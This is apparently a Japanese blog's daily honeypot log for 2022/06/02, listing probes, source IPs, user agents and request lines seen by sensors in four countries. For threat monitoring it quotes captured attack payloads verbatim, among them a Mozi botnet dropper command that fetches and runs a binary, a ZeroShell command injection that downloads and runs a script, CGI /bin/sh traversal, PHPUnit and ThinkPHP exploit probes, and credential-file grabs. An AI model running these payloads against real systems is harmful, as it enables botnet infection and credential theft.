コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2022/06/02 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2022/06/02分です。

特徴
共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnit脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gateway脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.awsへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
110.242.68.4に関する不正通信
45.85.218.132に関する不正通信
UserAgentがHello, Worldであるアクセス

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
curlによるスキャン行為
/.envへのスキャン行為
WordPress Pluginへのスキャン行為
phpMyAdminへのスキャン行為
45.85.218.132に関する不正通信

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
ZmEuによるスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
110.242.68.4に関する不正通信
45.85.218.132に関する不正通信
85.206.160.115に関する不正通信
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http://192.168.1.1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws
Location:SG

GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
zgrabによるスキャン行為
/.envへのスキャン行為
WordPressへのスキャン行為
45.85.218.132に関する不正通信
85.206.160.115に関する不正通信

を確認しました。

アクセス数推移

JP:総アクセス数:128 (前日比:-237)
US:総アクセス数:242 (前日比:-193)
UK:総アクセス数:75 (前日比:-128)
SG:総アクセス数:123 (前日比:42)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.85.218.32 China
1 1.202.113.206 China
1 1.202.119.197 China
1 5.252.194.39 Russia
1 14.204.44.209 China
1 14.204.44.240 China
1 20.123.80.42 United States
1 20.227.165.142 United States
1 27.227.186.14 China
1 27.227.186.40 China
1 27.227.186.86 China
1 27.227.186.164 China
1 35.86.220.74 United States
1 36.5.219.124 China
1 42.48.78.112 China
1 42.230.128.68 China
2 43.138.100.207 China
1 45.55.55.105 United States
1 45.72.78.51 Canada
3 45.81.232.249 Germany
1 45.141.157.242 Bulgaria
1 45.168.204.157 Brazil
1 51.159.152.255 France
1 54.202.133.44 United States
1 59.50.180.158 China
1 59.173.181.118 China
1 61.78.140.5 South Korea
1 69.164.219.174 United States
15 95.214.235.205 Ukraine
1 103.161.17.72 Vietnam
1 104.144.69.153 Canada
1 104.248.7.145 United States
1 106.12.3.163 China
2 109.237.103.9 Russia
4 109.237.103.118 Russia
1 110.177.177.114 China
1 110.177.179.52 China
1 110.177.180.238 China
1 111.162.141.158 China
1 111.225.149.135 China
1 112.80.139.28 China
1 112.246.51.84 China
1 115.73.150.146 Vietnam
1 117.14.157.142 China
1 117.25.124.3 China
1 120.85.112.82 China
1 123.160.174.55 China
1 123.245.25.66 China
1 124.31.105.125 China
1 124.117.195.246 China
1 125.47.254.211 China
1 125.84.236.32 China
1 125.84.237.94 China
6 135.125.244.48 France
7 135.125.246.189 France
1 139.59.165.170 Singapore
1 143.198.98.147 United States
1 150.255.39.255 China
2 157.245.70.127 United States
1 157.245.116.23 United States
1 167.172.247.109 United States
1 171.34.176.52 China
1 171.34.178.49 China
1 171.35.173.160 China
1 171.37.57.228 China
1 171.120.159.199 China
1 175.152.32.96 China
1 175.152.32.183 China
1 175.152.35.37 China
1 182.54.17.252 China
1 182.138.158.18 China
1 183.136.225.42 China
11 193.106.191.48 Russia
4 198.20.69.98 United States
1 203.176.129.249 Cambodia
1 205.210.31.17 United States
1 205.210.31.146 United States
1 218.72.51.66 China
1 220.250.62.197 China
1 222.94.163.27 China
1 222.172.131.165 China
1 223.166.75.98 China

UserAgent一覧

件数 UserAgent
14 -
1 Hello, World
8 Mozila/5.0
1 Mozilla/4.01707650 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; EmbeddedWB 14.52 from: http[:]//www[.]bsalsa[.]com/ EmbeddedWB 14.52; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
1 Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36
1 Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https[:]//zhanzhang[.]toutiao[.]com/)
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
22 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3239.132 Safari/537.36
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
40 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.01669615 Mozilla/5.0 (Linux; Android 5.1; S900PROBT Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Safari/537.36
16 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
1 curl/7.68.0

リクエスト内容一覧

件数 Method Request Protocol
3 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
3 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
4 CONNECT cn[.]bing[.]com:443 HTTP/1.1
4 CONNECT www[.]baidu[.]com:443 HTTP/1.1
4 CONNECT www[.]so[.]com:443 HTTP/1.1
4 CONNECT www[.]voanews[.]com:443 HTTP/1.1
2 GET /.aws/credentials HTTP/1.1
38 GET /.env HTTP/1.1
1 GET /.well-known/security.txt HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /Public/home/js/check.js HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
1 GET /console/ HTTP/1.1
6 GET /favicon.ico HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /index.php HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
2 GET /robots.txt HTTP/1.1
1 GET /sitemap.xml HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
2 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//safe[.]govfz[.]com/warn/land?u=http%3A%2F%2Fdongtaiwang[.]com%00&c=100110177&a=103&uuid=hangzhou-jingfang-1171337435-2523046903&d=&e=1006 HTTP/1.1
3 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
4 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
4 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
4 GET http[:]//www[.]soso[.]com/ HTTP/1.1
3 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
4 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /GponForm/diag_Form?images/ HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
7 POST /editBlackAndWhiteList HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Location:US

送信元IPアドレス一覧

件数 送信元IPアドレス
40 3.93.10.142 United States
1 20.71.32.110 United States
1 20.123.80.42 United States
7 45.81.232.249 Germany
1 46.161.27.171 Russia
9 51.79.29.48 Canada
1 51.159.152.255 France
1 54.219.137.161 United States
1 60.217.86.157 China
1 76.83.173.142 United States
119 89.247.33.105 Germany
1 101.58.81.5 Italy
1 104.248.7.145 United States
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 112.160.140.26 South Korea
1 121.181.14.46 South Korea
1 143.198.98.147 United States
1 147.182.239.192 United States
1 157.245.209.192 United States
1 162.142.125.7 United States
1 168.194.250.17 Brazil
4 172.105.85.90 United States
1 179.43.144.210 Panama
1 182.122.248.126 China
1 185.136.162.230 Germany
8 185.254.196.223 Ukraine
11 193.106.191.48 Russia
1 193.124.7.9 Czechia
2 194.165.16.73 Panama
1 198.235.24.8 United States
1 198.235.24.20 United States
14 203.248.175.71 South Korea
1 205.210.31.15 United States
1 218.67.220.113 China

UserAgent一覧

件数 UserAgent
30 -
1 Go-http-client/1.1
9 Mozila/5.0
1 Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
119 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
40 Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330
1 Mozilla/5.0 (iPad; CPU OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1
3 \"Mozilla/5.0
1 curl/7.68.0

リクエスト内容一覧

件数 Method Request Protocol
3 \x03
2 \x16\x03\x01\x01D\x01
3 \x16\x03\x01
7 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
24 GET /.env HTTP/1.1
1 GET /1phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /HNAP1 HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /_phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /_phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
1 GET /admin/.env HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/pma/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /api/.env HTTP/1.1
1 GET /app/.env HTTP/1.1
1 GET /application/.env HTTP/1.1
1 GET /apps/.env HTTP/1.1
1 GET /auth/.env HTTP/1.1
1 GET /back/.env HTTP/1.1
1 GET /backend/.env HTTP/1.1
14 GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5[.]206[.]227[.]228%2Fzero;sh%20zero;%22 HTTP/1.0
1 GET /cli/.env HTTP/1.1
1 GET /config/.env HTTP/1.1
1 GET /console/ HTTP/1.1
1 GET /core/.env HTTP/1.1
1 GET /cp/.env HTTP/1.1
1 GET /daili5/m.html?channelCode=daili5 HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /dependencies/.env HTTP/1.1
1 GET /deployment/.env HTTP/1.1
1 GET /dev/.env HTTP/1.1
1 GET /development/.env HTTP/1.1
1 GET /docker/.env HTTP/1.1
1 GET /document/.env HTTP/1.1
1 GET /engine/.env HTTP/1.1
1 GET /framework/.env HTTP/1.1
1 GET /frontend/.env HTTP/1.1
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /laravel-artisa/.env HTTP/1.1
1 GET /laravel/.env HTTP/1.1
1 GET /local/.env HTTP/1.1
1 GET /login/.env HTTP/1.1
1 GET /master/.env HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /nmaplowercheck1654054853 HTTP/1.1
1 GET /personal/.env HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4.9.7/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.1.3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5.2.0/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5.2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin_/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2021/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2022/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin_/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /private/.env HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /project/.env HTTP/1.1
1 GET /protected/.env HTTP/1.1
1 GET /rest/.env HTTP/1.1
1 GET /search/.env HTTP/1.1
1 GET /server/.env HTTP/1.1
1 GET /shared/.env HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
1 GET /site/.env HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /src/.env HTTP/1.1
1 GET /system/.env HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vod_installer/.env HTTP/1.1
1 GET /vue/.env HTTP/1.1
1 GET /web/.env HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 HEAD / HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
8 POST /editBlackAndWhiteList HTTP/1.1
1 POST /sdk HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:UK

送信元IPアドレス一覧

件数 送信元IPアドレス
1 1.69.18.253 China
1 1.85.218.249 China
2 2.57.121.130 Romania
1 14.204.44.42 China
1 20.78.0.142 United States
1 20.213.245.145 United States
1 27.155.144.23 China
1 27.215.126.33 China
1 34.223.57.3 United States
1 36.32.3.175 China
2 45.81.232.249 Germany
2 45.227.254.49 Belize
1 46.19.142.194 Panama
1 49.143.32.6 South Korea
1 85.113.44.207 Russia
3 89.248.165.52 United Kingdom
1 103.121.91.216 Vietnam
2 103.161.17.72 Vietnam
1 106.12.3.163 China
2 109.237.103.118 Russia
1 110.52.217.54 China
1 112.94.253.225 China
1 117.26.110.251 China
1 119.60.105.105 China
1 120.0.52.76 China
1 121.226.21.178 China
1 123.160.175.219 China
1 123.163.114.142 China
1 123.245.24.49 China
1 123.245.25.15 China
1 124.117.199.226 China
1 143.244.132.125 United States
1 144.255.19.42 China
2 157.230.216.203 United States
6 159.223.195.40 United States
1 167.248.133.120 United States
1 171.37.65.34 China
1 171.116.47.79 China
1 172.104.138.223 United States
1 177.22.228.30 Brazil
1 179.43.154.181 Panama
1 182.121.15.162 China
1 182.138.158.31 China
1 183.160.248.254 China
1 185.162.235.148 Russia
11 193.106.191.48 Russia
1 193.124.7.9 Czechia
1 200.110.51.133 Bolivia
1 205.210.31.3 United States
1 211.63.210.130 South Korea
1 219.157.53.158 China
1 220.250.11.58 China

UserAgent一覧

件数 UserAgent
20 -
1 Go-http-client/1.1
1 Hello, world
1 Java/1.8.0_333
6 Mozila/5.0
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
9 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
11 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 Gecko/20100101
1 Mozilla/5.01688858 Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
1 Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
8 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
6 ZmEu
1 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
2 -
2 \x03
1 \x16\x03\x01\x01D\x01
2 \x16\x03\x01
2 \x16\x03\x03
2 CONNECT 45[.]85[.]218[.]132:4444 HTTP/1.1
1 CONNECT 85[.]206[.]160[.]115:80 HTTP/1.1
2 CONNECT cn[.]bing[.]com:443 HTTP/1.1
1 CONNECT es[.]search[.]yahoo[.]com:443 HTTP/1.1
2 CONNECT www[.]baidu[.]com:443 HTTP/1.1
2 CONNECT www[.]so[.]com:443 HTTP/1.1
2 CONNECT www[.]voanews[.]com:443 HTTP/1.1
1 GET /.aws/credentials HTTP/1.1
1 GET /.git/HEAD HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
1 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1
1 GET /MyAdmin/scripts/setup.php HTTP/1.1
1 GET /_ignition/execute-solution HTTP/1.1
1 GET /ab2g HTTP/1.1
1 GET /ab2h HTTP/1.1
1 GET /actuator/gateway/routes HTTP/1.1
2 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
1 GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0
1 GET /console/ HTTP/1.1
1 GET /fuN3 HTTP/1.0
1 GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /myadmin/scripts/setup.php HTTP/1.1
1 GET /phpMyAdmin/scripts/setup.php HTTP/1.1
1 GET /phpmyadmin/scripts/setup.php HTTP/1.1
1 GET /pma/scripts/setup.php HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1
2 GET http[:]//dongtaiwang[.]com/ HTTP/1.1
1 GET http[:]//example[.]com/ HTTP/1.1
2 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
2 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
2 GET http[:]//www[.]soso[.]com/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD / HTTP/1.1
2 HEAD http[:]//110[.]242[.]68[.]4/ HTTP/1.1
1 OPTIONS / HTTP/1.1
1 POST /Autodiscover/Autodiscover.xml HTTP/1.1
1 POST /HNAP1/ HTTP/1.0
1 POST /HNAP1/ HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
5 POST /editBlackAndWhiteList HTTP/1.1
2 POST /rpc HTTP/1.1
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 PRI * HTTP/2.0
Location:SG

送信元IPアドレス一覧

件数 送信元IPアドレス
1 2.56.57.72 Netherlands
18 20.78.0.40 United States
1 20.188.24.63 United States
1 23.94.160.146 United States
1 35.86.238.45 United States
2 40.127.68.14 United States
40 44.203.138.23 United States
3 45.77.239.190 United States
1 45.81.232.249 Germany
1 46.161.27.171 Russia
3 49.142.208.186 South Korea
7 51.79.29.48 Canada
4 71.6.146.186 United States
1 84.38.132.36 Belize
3 89.248.165.52 United Kingdom
2 94.232.43.33 Russia
1 103.121.91.216 Vietnam
2 109.237.103.9 Russia
2 109.237.103.118 Russia
2 109.237.103.123 Russia
1 112.94.99.139 China
1 137.184.226.45 United States
